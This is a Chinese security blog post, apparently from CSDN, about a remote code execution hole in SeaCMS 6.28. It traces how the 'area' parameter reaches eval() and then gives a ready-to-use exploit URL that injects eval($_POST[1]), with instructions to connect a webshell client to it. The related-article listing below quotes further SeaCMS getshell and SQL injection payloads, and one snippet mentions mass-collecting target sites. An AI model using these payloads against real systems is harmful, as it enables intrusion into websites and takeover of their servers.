海洋CMS6.28命令执行漏洞

最新推荐文章于 2024-05-20 16:38:56 发布
最新推荐文章于 2024-05-20 16:38:56 发布
阅读量8.8k 收藏 1
点赞数
分类专栏: 漏洞库

0x00 代码审计

area参数处理过的地方经过字符是否非法判断之后,调用echoSearchPage()函数

area参数经过了检测是否是拼音之后

接下来到了

   
   
  1. $content=$mainClassObj->parseSearchItemList($content,"area");

因为能执行php代码一般就是eval()函数

搜索一下这个页面有eval函数的地方

   
   
  1.  for($m=0;$m<$arlen;$m++){ $strIf=$iar[1][$m]; $strIf=$this->parseStrIf($strIf);
  2. $strThen=$iar[2][$m];
  3. $strThen=$this->parseSubIf($strThen);
  4.  if (strpos($strThen,$labelRule2)===false){
  5.  if (strpos($strThen,$labelRule3)>=0){
  6. $elsearray=explode($labelRule3,$strThen);
  7. $strThen1=$elsearray[0];
  8. $strElse1=$elsearray[1];
  9.  @eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");
  10.  if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);} else {$content=str_replace($iar[0][$m],$strElse1,$content);}
  11.  }else{
  12.  @eval("if(".$strIf.") { \$ifFlag=true;} else{ \$ifFlag=false;}");
  13.  if ($ifFlag) $content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);}
  14.  }

可以在这里下个断点,把变量打印出来

就可以清晰的看到就是在这执行了我们的命令

0x01 EXP

 

   
   
  1. /search.php?searchtype=5&tid=&area=eval($_POST[1])

直接菜刀链接 链接密码1

番薯道长
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
cms代码审计之命令执行
化鱼的博客
07-05 339
0x01 序言 在社区看到一个大佬的分析,过程很详细。自己跟着走了一遍,收货颇多。 0x02 话不多说就是干 漏洞出现在App\Weibo\Controller\ShareController.calss.php中的 使用了 I()函数获取了query的值,并进行了解码。然后display模板,看下模板那里 Common/functions.php看下W() W()是渲染的功能, {:W('Weibo/Share/fetchShare',array('param'=>$parse_array))
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)--文件包含漏洞
qq_28624871的博客
03-13 5838
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)–文件包含漏洞 前言 最近几天在给协会的学弟讲代码审计入门相关内容,便找了这个熊海CMS_V1.0来教学,结果在这个过程中遇到蛮多问题的,于是这篇文章详细记录了对熊海CMS_V1.0从搭建到审计与漏洞分析的过程,其中踩了很多坑,这些坑网上也没有什么记录,也是我之前学习过程中没有去仔细发现和研究的,果然古人诚不欺我,温故而知新,通过给学弟们讲这个简单的代码审计又学习到了很多新的内容,也欢迎阅读这篇文章的师傅们对文章出现的问题一起探讨交流,不足的地方也请多多
Seacms代码审计小结(后台多处getshell)1
08-03
在框架中,有很多是写的是以 txt 结尾的件,这种直接读是法以 php 来解析,但是如果找到处件包含的漏洞,让他包含的是这种我们可以修改的件,那就也可以造成代码
SeaCMS海洋影视管理系统dmku存在SQL注入漏洞
最新发布
weixin_43167326的博客
05-20 872
海洋影视管理系统(seacms海洋cms海洋cms是基于PHP+MySql技术开发的开源CMS,是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选。SeaCMS是基于GPL协议100%开源免费,自适应电脑、手机、平板、APP多终端入口,无加密、安全有保障!SeaCMS dmku存在SQL 注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
seacms前台getshell
ranuy阮的博客
06-11 1056
0x01 简介 海洋影视管理系统(seacms海洋cms海洋cms是基于PHP+MySql技术开发的开源CMS,是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选。 0x02 环境搭建 使用phpstudy进行搭建。将整个upload上传到phpstudy目录下的www目录。将upload更改为seacms。 http://xxx.xxx.xxx.xxx/seacms/install/index.php进行安装。 安装成功后访问前台界面
seacms 远程命令执行 (CNVD-2020-22721)漏洞复现
weixin_42675091的博客
09-06 1162
seacms 远程命令执行 (CNVD-2020-22721)漏洞复现
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
海洋cms(海洋影视管理系统) v6.28
12-05
海洋影视管理系统(seacms海洋cms)是一套专为不同需求的而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。
第五节 命令执行漏洞利用-01
09-15
命令执行漏洞利用 命令执行漏洞是一种常见的安全漏洞,攻击者可以通过命令执行漏洞执行恶意命令,获取服务器的控制权。今天,我们将深入探讨命令执行漏洞的利用方法,包括 PHP 下命令执行的补充、eval 函数的介绍...
免费海洋CMS插件-免费采集伪原创发布推送插件
02-24
免费海洋CMS插件-免费海洋CMS插件包含关键词采集,关键词文章采集,伪原创,自动发布,自动推送搜索引擎。实现全自动SEO优化的海洋CMS插件
74CMS_6.0.48_远程命令执行_CNVD-2021-45280
02-22
本文为 漏洞编号 CNVD-2021-45280 ,即 74CMS 远程命令执行漏洞利用工具源码内容 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 更...
Seacms漏洞
Grey的博客
07-10 5011
海洋CMS6.45前台getshell漏洞复现结果:http://127.0.0.1/CMS/seacms_v6.4/upload/search.phppost:searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}1.漏洞的触发点是在search.php 中的echoSearchPage()函数可以触发漏洞。常规的分析都是先找...
seacms最新版前台getshell
weixin_34025051的博客
06-10 165
cms版本:6.45,这是做一道ctf题目遇到的 实际上知道漏洞之后,题目并不难,记录的原因是。。。。payload一句话花了我一个小时。。 orz,不知道在干嘛,就是一直不成功! 漏洞原文 直接说题目,有了poc之后,我们试着写进去一句话 根据poc构造我们的paylaod }{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end...
i春秋 “百度杯”CTF比赛 九月场 Test
include_heqile的博客
09-17 1010
https://www.ichunqiu.com/battalion?t=1&r=0 这道题还是蛮不错的,下面我来说一下解题思路 首先进入题目链接,然后搜索seacms相关漏洞,我直接使用了百度出来的第一条,freebuf上的一篇文章: http://www.freebuf.com/vuls/150042.html 漏洞利用方式如下: 我们把eval改成system,把9[]...
i春秋CTF训练 Web Test
椰奶冻不安全的博客
07-05 1495
Web Test 题目内容:善于查资料,你就可以拿一血了。 题目链接请在i春秋申请 根据提示直接在搜索引擎上查询海洋cms漏洞,发现曾经有过前台getshell,用poc试一下 searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpa
Seacms6.45最新前台getshell漏洞
pygain的博客
02-20 6535
Seacms最新的版本为6.45 更新后的版本存在着一个前台getshell问题
seacms sql注入
Matthew
08-30 5727
最近在学习代码审计,审到一个注入,提交,说重复了,好尴尬啊。 源码下载:http://www.mycodes.net/47/7976.htm 在/i.php,获取ip的时候,全局的ip获取是做了正则。不知道问什么这里重新进行了一次ip的获取。<?php session_start(); require_once("include/common.php"); require_once(sea_I
php影视管理系统下载,seacms影视管理系统
weixin_34643336的博客
03-10 1128
海洋影视管理系统(seacms海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。海洋cms采用PHP+MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。海洋cms支持一键转换原max的模板和数据,实现网站无缝迁移到新平台。众多人性化功能设计,超海洋...
海洋seacms漏洞利用
xf555er的博客
04-16 3050
0x001-url采集 通过对海洋cms源码研究,找出含有标志性的网站目录(search.php?searchtype=),然后利用url采集工具批量采集seacms网站 0x002-漏洞payload payload:/`comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_w...
熊海cms的文件包含漏洞
07-29
你好!关于熊海CMS的文件包含漏洞,我可以给你一些基本信息。文件包含漏洞是一种常见的安全漏洞,它允许攻击者通过包含恶意文件来执行任意代码或获取敏感信息。 针对熊海CMS的文件包含漏洞,你可以采取以下措施来缓解风险: 1. 及时更新:确保你使用的是最新版本的熊海CMS,并及时应用官方发布的安全补丁和更新。 2. 输入验证:对用户输入进行严格的验证和过滤,以防止恶意文件路径或代码的注入。 3. 文件访问限制:限制用户对系统文件的访问权限,确保只有授权用户可以访问敏感文件。 4. 安全配置:检查服务器和应用程序的安全配置,例如关闭不必要的功能和服务,并设置适当的访问控制。 5. 安全审计:定期进行安全审计和漏洞扫描,以及监控系统日志,及时发现异常行为和攻击尝试。 请记住,这些是一般性的建议,如果你遇到了特定的问题或需要进一步的帮助,请咨询安全专家或熊海CMS官方支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值